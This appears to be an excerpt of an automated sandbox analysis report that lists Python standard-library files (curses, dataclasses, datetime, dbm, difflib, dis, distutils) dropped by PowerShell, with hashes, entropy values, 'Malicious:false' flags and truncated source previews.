                                                                                                                                                                                                            Preview:..#..# Emulation of has_key() function for platforms that don't use ncurses..#....import _curses....# Table mapping curses keys to the terminfo capability name...._capability_names = {.. _curses.KEY_A1: 'ka1',.. _curses.KEY_A3: 'ka3',.. _curses.KEY_B2: 'kb2',.. _curses.KEY_BACKSPACE: 'kbs',.. _curses.KEY_BEG: 'kbeg',.. _curses.KEY_BTAB: 'kcbt',.. _curses.KEY_C1: 'kc1',.. _curses.KEY_C3: 'kc3',.. _curses.KEY_CANCEL: 'kcan',.. _curses.KEY_CATAB: 'ktbc',.. _curses.KEY_CLEAR: 'kclr',.. _curses.KEY_CLOSE: 'kclo',.. _curses.KEY_COMMAND: 'kcmd',.. _curses.KEY_COPY: 'kcpy',.. _curses.KEY_CREATE: 'kcrt',.. _curses.KEY_CTAB: 'kctab',.. _curses.KEY_DC: 'kdch1',.. _curses.KEY_DL: 'kdl1',.. _curses.KEY_DOWN: 'kcud1',.. _curses.KEY_EIC: 'krmir',.. _curses.KEY_END: 'kend',.. _curses.KEY_ENTER: 'kent',.. _curses.KEY_EOL: 'kel',.. _curses.KEY_EOS: 'ked',.. _curses.KEY_EXIT: 'kext',.. _curses.KEY_F0: 'kf0',.. _curses.KEY_F1
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):93
                                                                                                                                                                                                            Entropy (8bit):4.41480518258504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:XHWSwojbJAUXFJQBXWov3Z6HG7ASBiv:XHWSdjbHXFqX7ii7M
                                                                                                                                                                                                            MD5:5D453D87DBDD7C37EB62894B472EB094
                                                                                                                                                                                                            SHA1:67787E6A4D122CD29B3A66D20084E8C6CF0CA126
                                                                                                                                                                                                            SHA-256:9B10A03C3224939D9BE2A078FE896DA5CFEAA9740D265F8052B5403BC5E15BBF
                                                                                                                                                                                                            SHA-512:8644680425F755CFB0B62AA5E52ABABE68AB0471A1D79EEEBD99CD9A8EDB6916B5230451BEA9F9B08ACDFE21358666123A2C2DCF3D3212AC2B12D89940DE41F9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""curses.panel....Module for using panels with curses..."""....from _curses_panel import *..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7858
                                                                                                                                                                                                            Entropy (8bit):4.332455152050213
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:P6dHpCmeBad+KxGBjgCt+GgUE8ytI1NZG65F2ERFBIsyiU4fIXYivRB264tQga:iYUdl20tI5GWFRRcsyiU4ti54tQga
                                                                                                                                                                                                            MD5:DD91DF75B078E3244BC13D35B9720367
                                                                                                                                                                                                            SHA1:60FFFCFCA35076C7334EA5E9D5F7E5B9D7A9F166
                                                                                                                                                                                                            SHA-256:C8F8A7BA4705B571AA46BA16870FC9CFA8B9C5A4633E30556FF7DA162F67B15D
                                                                                                                                                                                                            SHA-512:2ACE5EFCF60B261019F3EB718888723E4BD620B9FDA805656197652DA7B4D694BEC07A71E48972CFCC0AA4DC98733F2D34B7141894C4337A4BB690917631D598
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Simple textbox editing widget with Emacs-like keybindings."""....import curses..import curses.ascii....def rectangle(win, uly, ulx, lry, lrx):.. """Draw a rectangle with corners at the provided upper-left.. and lower-right coordinates... """.. win.vline(uly+1, ulx, curses.ACS_VLINE, lry - uly - 1).. win.hline(uly, ulx+1, curses.ACS_HLINE, lrx - ulx - 1).. win.hline(lry, ulx+1, curses.ACS_HLINE, lrx - ulx - 1).. win.vline(uly+1, lrx, curses.ACS_VLINE, lry - uly - 1).. win.addch(uly, ulx, curses.ACS_ULCORNER).. win.addch(uly, lrx, curses.ACS_URCORNER).. win.addch(lry, lrx, curses.ACS_LRCORNER).. win.addch(lry, ulx, curses.ACS_LLCORNER)....class Textbox:.. """Editing widget using the interior of a window object... Supports the following Emacs-like key bindings:.... Ctrl-A Go to left edge of window... Ctrl-B Cursor left, wrapping to previous line if appropriate... Ctrl-D Delete character under cursor... Ctrl-E Go to
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):57843
                                                                                                                                                                                                            Entropy (8bit):4.565189337129502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:nN1yQRUzsfd87Ds0ZrrOt2cldG0DNhWJuH5hmzsG/8n/6ItzBGonv:nNbRP4ByBGqv
                                                                                                                                                                                                            MD5:EEC7AE15E02166AF44AF145D8D3EE693
                                                                                                                                                                                                            SHA1:1924169EAA60357FB673D38EE9A3B7FFF4679AAE
                                                                                                                                                                                                            SHA-256:E8B1C870DA3EFFEC3260E4126BD55197A836D14C4F4CC886F791BDDE36F6EA12
                                                                                                                                                                                                            SHA-512:CAC4D5FFB67FFA3BB95A3C331158D9ABD8F3DAC1E1F2FE792F52DFD2F1213E5777C9736BE045814A6F6CA0E99DC39CD1DC2B6D9D52EE941D9003F8C37935C47E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import re..import sys..import copy..import types..import inspect..import keyword..import builtins..import functools..import abc..import _thread..from types import FunctionType, GenericAlias......__all__ = ['dataclass',.. 'field',.. 'Field',.. 'FrozenInstanceError',.. 'InitVar',.. 'KW_ONLY',.. 'MISSING',.... # Helper functions... 'fields',.. 'asdict',.. 'astuple',.. 'make_dataclass',.. 'replace',.. 'is_dataclass',.. ]....# Conditions for adding methods. The boxes indicate what action the..# dataclass decorator takes. For all of these tables, when I talk..# about init=, repr=, eq=, order=, unsafe_hash=, or frozen=, I'm..# referring to the arguments to the @dataclass decorator. When..# checking if a dunder method already exists, I mean check for an..# entry in the class's __dict__. I never check to see if an attribute..# is defined in a base class
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):90610
                                                                                                                                                                                                            Entropy (8bit):4.496267695360937
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:2UIQYbeLycfOz9BFqOPRlQ39heBzF2B112wHY5:2UIQYSxfOzUOPDm0Bua+C
                                                                                                                                                                                                            MD5:B5F6D238CA79D8E5D3AAE5257EC3CE47
                                                                                                                                                                                                            SHA1:19F628431FE6CC65407C2457324F8CCD51B385BF
                                                                                                                                                                                                            SHA-256:E52A488B10C34E4D7C09740D2BFE2876C5AD6768FFDB66D8582224E55376B67B
                                                                                                                                                                                                            SHA-512:B7CD3C2D46D93C0E096F9231106951EEF265A29D7212DAFCBF8EEBA79BF768D88AC683BEAD312C0A5E9498CA8356E91AB93E029D6F6B1B217548D6C8E4A5FF18
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Concrete date/time and related types.....See http://www.iana.org/time-zones/repository/tz-link.html for..time zone and DST data sources..."""....__all__ = ("date", "datetime", "time", "timedelta", "timezone", "tzinfo",.. "MINYEAR", "MAXYEAR")......import time as _time..import math as _math..import sys..from operator import index as _index....def _cmp(x, y):.. return 0 if x == y else 1 if x > y else -1....MINYEAR = 1..MAXYEAR = 9999.._MAXORDINAL = 3652059 # date.max.toordinal()....# Utility functions, adapted from Python's Demo/classes/Dates.py, which..# also assumes the current Gregorian calendar indefinitely extended in..# both directions. Difference: Dates.py calls January 1 of year 0 day..# number 1. The code here calls January 1 of year 1 day number 1. This is..# to match the definition of the "proleptic Gregorian" calendar in Dershowitz..# and Reingold's "Calendrical Calculations", where it's the base calendar..# for all computations. See the book for algorit
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6028
                                                                                                                                                                                                            Entropy (8bit):4.43522803289218
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Y0Z6om2P6kXGyFQBEIA7FZKOYS8QYG6mV49ZlUNhNtbPFXPl0lWtEU:jN1ikXGgQ+77FZVJlV8lwr95PZtT
                                                                                                                                                                                                            MD5:AAA7BF10D5BB5125CD6A9F6584EFDFBD
                                                                                                                                                                                                            SHA1:E2DDC2C9069BF1394F5BB930A636A69E2F114B8B
                                                                                                                                                                                                            SHA-256:31CCB3572790579F00A99D0E76513E43F1554D8E72BE2B83C4795427F24885B2
                                                                                                                                                                                                            SHA-512:91EDF7E2E6FC44462F53C2EBD8F4CEE535298034DA5656959DC00C8B1FF3F90C8FC08B4B148BA4E3E8EEF9E2F77DE77F7ECF2250ABAE70AE574E5981176782F3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Generic interface to all dbm clones.....Use.... import dbm.. d = dbm.open(file, 'w', 0o666)....The returned object is a dbm.gnu, dbm.ndbm or dbm.dumb object, dependent on the..type of database being opened (determined by the whichdb function) in the case..of an existing dbm. If the dbm does not exist and the create or new flag ('c'..or 'n') was specified, the dbm type will be determined by the availability of..the modules (tested in the above order).....It has the following interface (key and data are strings):.... d[key] = data # store data at key (may override data at.. # existing key).. data = d[key] # retrieve data at key (raise KeyError if no.. # such key).. del d[key] # delete data stored at key (raises KeyError.. # if no such key).. flag = key in d # true if the key exists.. list = d.keys() # return a list of all existing keys (slow!)....Future versio
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11852
                                                                                                                                                                                                            Entropy (8bit):4.456406302245384
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:LyENNkKga8J8/o/LMwRU0hY9uD+g80U/RT18/e3n33M3qNcR4:LYaKMyhce4
                                                                                                                                                                                                            MD5:90265924B0CF9D1E3A0EF2BB2D549CE2
                                                                                                                                                                                                            SHA1:7E53DFC0CC4E6923C2EEF405631364C8754605FB
                                                                                                                                                                                                            SHA-256:96FC314ECD5EA6344FB016F3631D8013B214627D30B5AB19C21D1D6D35C5306A
                                                                                                                                                                                                            SHA-512:9A2A5E08CB8976F84DBA28A59FF1B132F60597D3C9499B33A5E0DA6A193F63339DD468B7223545BFC7B20B248C520739D4C6BBD86451262FE2A51D7A5D7F0160
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""A dumb and slow but simple dbm clone.....For database spam, spam.dir contains the index (a text file),..spam.bak *may* contain a backup of the index (also a text file),..while spam.dat contains the data (a binary file).....XXX TO DO:....- seems to contain a bug when updating.......- reclaim free space (currently, space once occupied by deleted or expanded..items is never reused)....- support concurrent access (currently, if two processes take turns making..updates, they can mess up the index)....- support efficient access to large databases (currently, the whole index..is read when the database is opened, and some updates rewrite the whole index)....- support opening for read-only (flag = 'm')...."""....import ast as _ast..import io as _io..import os as _os..import collections.abc....__all__ = ["error", "open"]...._BLOCKSIZE = 512....error = OSError....class _Database(collections.abc.MutableMapping):.... # The on-disk directory and data files can remain in mutually.. # inconsi
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):75
                                                                                                                                                                                                            Entropy (8bit):4.301891945228928
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:OAArkHIF3BcTxIxPjZ6CH4JgBiv:OlIQBdx9mgBM
                                                                                                                                                                                                            MD5:49B75CF4D832E5DB5BFE4537C5332188
                                                                                                                                                                                                            SHA1:2EB4AA2CC6539F68E5A42590919F97CF02B47F24
                                                                                                                                                                                                            SHA-256:98DCF3E73DC56C7DBF013852F685EAC1FE3A911785E682AB69836EBA5656C142
                                                                                                                                                                                                            SHA-512:AD5DF52AD3AEF6D44F23D934CD3DE15E7D1BA4900FDE2E70C21009B074C718A47ECFEFA2B14B2FE9462B7DC0BBA8C5371236CA926704A0FD21DEC0FF4D1B450B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Provide the _gdbm module as a dbm submodule."""....from _gdbm import *..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):73
                                                                                                                                                                                                            Entropy (8bit):4.237502560318079
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:OAArb0cTxIxPjZ6xxBiv:OlUdx98xBM
                                                                                                                                                                                                            MD5:5967B257F3143A915F76FA1F4494E989
                                                                                                                                                                                                            SHA1:BD1C90535C5926383AE4B6D02936AB96A147AE92
                                                                                                                                                                                                            SHA-256:D747238751AA697D7040EE1479E0C3EFF0172E1195825061CF517CF9BEF30050
                                                                                                                                                                                                            SHA-512:B6DB12A07B47BB2D034354B81CF4EDEC4E7F1305DE222FC7E68F14AB290F12F9F576D7BB4EFF138186E1B6DED2168882A79447EA1BCFDD3ED5C19869503EEBD9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Provide the _dbm module as a dbm submodule."""....from _dbm import *..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):331
                                                                                                                                                                                                            Entropy (8bit):4.098213504925523
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:DoJ2xToJ2xpdOWoJ2x7EdMoJ2xhVfwRpLXGFJ2xTFJ2xpdOWFJ2x7EdMFJ2xhVfv:E4xU4xpdg4xgdN4xhVfYRW4xR4xpdt4E
                                                                                                                                                                                                            MD5:19468B7C81C8C73F6B37DE1BE745672C
                                                                                                                                                                                                            SHA1:1877E11D665B90BCEBED2341A6806DCBC62FB499
                                                                                                                                                                                                            SHA-256:F205D8DC95D81B5D2B59362CBE0E385CFEEB98C14A70971F3372BE1403378B03
                                                                                                                                                                                                            SHA-512:3D129FA184C46A8B8D77D235946875DA7543EE964E1FEEC5986C3816EA9A4D023F3A71A3EBDA9D6539CF7F561C8E0D8F9749B9CB3310B84B16391642A5E7CD2A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..try:.. from _decimal import *.. from _decimal import __doc__.. from _decimal import __version__.. from _decimal import __libmpdec_version__..except ImportError:.. from _pydecimal import *.. from _pydecimal import __doc__.. from _pydecimal import __version__.. from _pydecimal import __libmpdec_version__..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85364
                                                                                                                                                                                                            Entropy (8bit):4.512246773776763
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:PxMUIKEi9FINTaSyEJH7/7Jh1rHww2FJQppY5VbhCAMqRCKM8g6S8/2wUcZ:vIBqqY5VbhCAM+CKM8FS8/VZ
                                                                                                                                                                                                            MD5:FF9CBAADC1B0F414B2627CE5F761AB8E
                                                                                                                                                                                                            SHA1:8ED742A47D1C009E2789328C2AD2DF72D3788B7F
                                                                                                                                                                                                            SHA-256:F517AE2F8750BD8A1C7A2F5BB14310CA2D961B7402AF7A8AB256EF75C91769B6
                                                                                                                                                                                                            SHA-512:191349E29C43C528D9246607189E6F8D740134121A46EF96E94C0A51C441EEC8D47C05DFDC53E33294EF35B35BD7153A3DDA7B5DBF1A41F9FA4F6309D3D5CCD6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..Module difflib -- helpers for computing deltas between objects.....Function get_close_matches(word, possibilities, n=3, cutoff=0.6):.. Use SequenceMatcher to return list of the best "good enough" matches.....Function context_diff(a, b):.. For two lists of strings, return a delta in context diff format.....Function ndiff(a, b):.. Return a delta: the difference between `a` and `b` (lists of strings).....Function restore(delta, which):.. Return one of the two sequences that generated an ndiff delta.....Function unified_diff(a, b):.. For two lists of strings, return a delta in unified diff format.....Class SequenceMatcher:.. A flexible class for comparing pairs of sequences of any type.....Class Differ:.. For producing human-readable deltas from sequences of lines of text.....Class HtmlDiff:.. For producing HTML side by side comparison with change highlights..."""....__all__ = ['get_close_matches', 'ndiff', 'restore', 'SequenceMatcher',.. 'Differ','IS
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20560
                                                                                                                                                                                                            Entropy (8bit):4.531273573237088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:0Gvbyi+sLuRyATo/3uMzm3FQ1R9tAvmDjOJOA:0Gvby6uwBzm3FQ1D6vmDjOoA
                                                                                                                                                                                                            MD5:629C132558A9EC0AADDA6B3568285463
                                                                                                                                                                                                            SHA1:2E4614EC3EA4943F55562B1BD10E460EF73CF310
                                                                                                                                                                                                            SHA-256:3DF71EEE06EF515D91204CB4A2AE9C0946C968473C51D2D902C82FB2B62BEA2E
                                                                                                                                                                                                            SHA-512:44E928B67353078A8B486DA58E6ECC91049A1B40B2D5EA0FE3C5018C028BDB4F13B41E25E1B99D8CB0AFA29A66CE348F899773A8805BC76A17C1B599B7879155
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Disassembler of Python byte code into mnemonics."""....import sys..import types..import collections..import io....from opcode import *..from opcode import __all__ as _opcodes_all....__all__ = ["code_info", "dis", "disassemble", "distb", "disco",.. "findlinestarts", "findlabels", "show_code",.. "get_instructions", "Instruction", "Bytecode"] + _opcodes_all..del _opcodes_all...._have_code = (types.MethodType, types.FunctionType, types.CodeType,.. classmethod, staticmethod, type)....FORMAT_VALUE = opmap['FORMAT_VALUE']..FORMAT_VALUE_CONVERTERS = (.. (None, ''),.. (str, 'str'),.. (repr, 'repr'),.. (ascii, 'ascii'),..)..MAKE_FUNCTION = opmap['MAKE_FUNCTION']..MAKE_FUNCTION_FLAGS = ('defaults', 'kwdefaults', 'annotations', 'closure')......def _try_compile(source, name):.. """Attempts to compile the given source, first as an expression and.. then as a statement if the first approach fails..... Utility function to accept strings in
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):255
                                                                                                                                                                                                            Entropy (8bit):4.6313356580407445
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:hBmHtmSZCuZSolMH3usUKsrfEBNJKUGLqRiXZn:hB4mmDZSouH7Uv+Tfip
                                                                                                                                                                                                            MD5:0236404AED89DB8FD9467CBD1DD3A519
                                                                                                                                                                                                            SHA1:4C13C4F3DB99DF9B6A4AAB72DCABB4E2BC35C6C9
                                                                                                                                                                                                            SHA-256:BCB111B8EC43D1D7FEA36819E1FEE6318382EDDAEDE19537D9A7FC42E7B52D96
                                                                                                                                                                                                            SHA-512:B7BFB14A90723BE6F0B5971111E781C5BBC76F20C998F530F6340356A2FAFE09A387D8C74C71B9CAE2AAD6FFA46E021EF21968B9BCCAA1E9C066641C0550D8E9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:This directory contains the Distutils package.....There's a full documentation available at:.... https://docs.python.org/distutils/....The Distutils-SIG web page is also a good starting point:.... https://www.python.org/sigs/distutils-sig/....$Id$..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):561
                                                                                                                                                                                                            Entropy (8bit):4.7903414603052425
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:HYRjqIFDE5rkTRuMdhb1WgXgjVVii1RenDZfH4ZPdfJ6wWwUBRtFQy:HXIFDqIRuMb1WSgjVMo4nFfidBWweL
                                                                                                                                                                                                            MD5:F11B5E5423DB724F6CBDBBFFFECBEF64
                                                                                                                                                                                                            SHA1:DDD42EEAA1B7F74B994F3228FC4059F2A811E514
                                                                                                                                                                                                            SHA-256:D20D9EE98DD7B4A0BD87481D9EDCE81D45D910271D43D17CADA6E2BB2D8C9780
                                                                                                                                                                                                            SHA-512:528115993F3E653F6C250151E041224E56136C3543E0354C09C77079959D3BABC0787A548565062C153EA2732E5778F205CB9E17D361D0F7F17FC795149CB195
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils....The main package for the Python Module Distribution Utilities. Normally..used from a setup script as.... from distutils.core import setup.... setup (...).."""....import sys..import warnings....__version__ = sys.version[:sys.version.index(' ')]...._DEPRECATION_MESSAGE = ("The distutils package is deprecated and slated for ".. "removal in Python 3.12. Use setuptools or check ".. "PEP 632 for potential alternatives")..warnings.warn(_DEPRECATION_MESSAGE,.. DeprecationWarning, 2)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20546
                                                                                                                                                                                                            Entropy (8bit):4.567298062952414
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:5LHYxRTjj5hQ78soihBmw3L/t8u2i2xqUNGs:9HSdkIObei2H
                                                                                                                                                                                                            MD5:1B2A9F6D1755A9E9D9AA65B7326E19A2
                                                                                                                                                                                                            SHA1:743735CAFE8C4ECB25789317216D0C0FADF9491C
                                                                                                                                                                                                            SHA-256:7F5BA48551AC8F932B5C3CE6CF00B98756BD47383A07143AFB60807A3C5D554B
                                                                                                                                                                                                            SHA-512:CEF467268AD22B9DFF67D38A6138EB451C620658923A48829EF74F3E7BDBAD1261B6262BD9445B59618852362C9665017BA03266C14D01E2F59FC5B670255F9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils._msvccompiler....Contains MSVCCompiler, an implementation of the abstract CCompiler class..for Microsoft Visual Studio 2015.....The module is compatible with VS 2015 and later. You can find legacy support..for older versions in distutils.msvc9compiler and distutils.msvccompiler..."""....# Written by Perry Stoll..# hacked by Robin Becker and Thomas Heller to do a better job of..# finding DevStudio (through the registry)..# ported to VS 2005 and VS 2008 by Christian Heimes..# ported to VS 2015 by Steve Dower....import os..import subprocess..import winreg....from distutils.errors import DistutilsExecError, DistutilsPlatformError, \.. CompileError, LibError, LinkError..from distutils.ccompiler import CCompiler, gen_lib_options..from distutils import log..from distutils.util import get_platform....from itertools import count....def _find_vc2015():.. try:.. key = winreg.OpenKeyEx(.. winreg.HKEY_LOCAL_MACHINE,.. r"Soft
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8828
                                                                                                                                                                                                            Entropy (8bit):4.555910228156744
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:e3RUjY6BLWfwULHZwncKoqa3TdWbrM7LHOaY:gRm99WtZwcJnTdWbQuv
                                                                                                                                                                                                            MD5:62F7B8D4F48AED01BBB8845C164D2DCA
                                                                                                                                                                                                            SHA1:E6C4231A1D2CD28885A307A5A2E92E3ECCC0C094
                                                                                                                                                                                                            SHA-256:1269FD4F5DA0E20A50450A72FF2331F282A04CB0802CB6DE38BA1052BB6729EA
                                                                                                                                                                                                            SHA-512:83CC733A759D2D2364BC4613AD03F5982A00437225F4C65D16A5A09EEADB1005643D6A30BF984A53CE816D2C2D140663415B46FC7990699FE3BB0167037B6423
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.archive_util....Utility functions for creating archive files (tarballs, zip files,..that sort of thing)."""....import os..from warnings import warn..import sys....try:.. import zipfile..except ImportError:.. zipfile = None......from distutils.errors import DistutilsExecError..from distutils.spawn import spawn..from distutils.dir_util import mkpath..from distutils import log....try:.. from pwd import getpwnam..except ImportError:.. getpwnam = None....try:.. from grp import getgrnam..except ImportError:.. getgrnam = None....def _get_gid(name):.. """Returns a gid, given a group name.""".. if getgrnam is None or name is None:.. return None.. try:.. result = getgrnam(name).. except KeyError:.. result = None.. if result is not None:.. return result[2].. return None....def _get_uid(name):.. """Returns an uid, given a user name.""".. if getpwnam is None or name is None:.. return None.. try:.. re
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15287
                                                                                                                                                                                                            Entropy (8bit):4.306288162870589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:0QkuyePnXi1vS5F/hfT2G/mm76MMx2DpCCMIDEmIdf3LjSfu:Euyd1efT2kmm76+kffb2fu
                                                                                                                                                                                                            MD5:30EAB5F49ED5AFBD71EE48EED3F179A0
                                                                                                                                                                                                            SHA1:2D699E3427D819F7D97AF78C754AD37CD2403189
                                                                                                                                                                                                            SHA-256:5B1B928D077CA5273FF912E6B884520002B367052A5BE4034CADF00D79972898
                                                                                                                                                                                                            SHA-512:F533754FE82A0C8E18008D0877406711B20ACB7E693EC4788B86EEE9E55E0EC3BFE2EA3B7D65C91EA681CBB86FA460EF54E737DD610B3251817425741214B89F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.bcppcompiler....Contains BorlandCCompiler, an implementation of the abstract CCompiler class..for the Borland C++ compiler..."""....# This implementation by Lyle Johnson, based on the original msvccompiler.py..# module and using the directions originally published by Gordon Williams.....# XXX looks like there's a LOT of overlap between these two classes:..# someone should sit down and factor out the common code as..# WindowsCCompiler! --GPW......import os..from distutils.errors import \.. DistutilsExecError, \.. CompileError, LibError, LinkError, UnknownFileError..from distutils.ccompiler import \.. CCompiler, gen_preprocess_options..from distutils.file_util import write_file..from distutils.dep_util import newer..from distutils import log....class BCPPCompiler(CCompiler) :.. """Concrete class that implements an interface to the Borland C/C++.. compiler, as defined by the CCompiler abstract class... """.... compiler_type = 'bcpp'.... # Just set
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):48534
                                                                                                                                                                                                            Entropy (8bit):4.425049361366213
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:T2ebals/xGaMn/6Xv4vzK2dHOS3MySGX4:TgTv26H1TSz
                                                                                                                                                                                                            MD5:6589EAA27D9799497EF8E126CE42001F
                                                                                                                                                                                                            SHA1:8620AF985ADCBF4C31272209BF4AFC03D3E89E59
                                                                                                                                                                                                            SHA-256:D3B2F28E6DF714FCEBFA3F90A283C2DF80FB753900D615DB0B51D3F82C7B081C
                                                                                                                                                                                                            SHA-512:BA8F3208A25B3234465D9AA2F88E879C83E0D3319562C0034D9E770266F376958FF6D1FAB36088CEE06C328B33241B11EFF1BAC29229E8576812B6B180304254
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
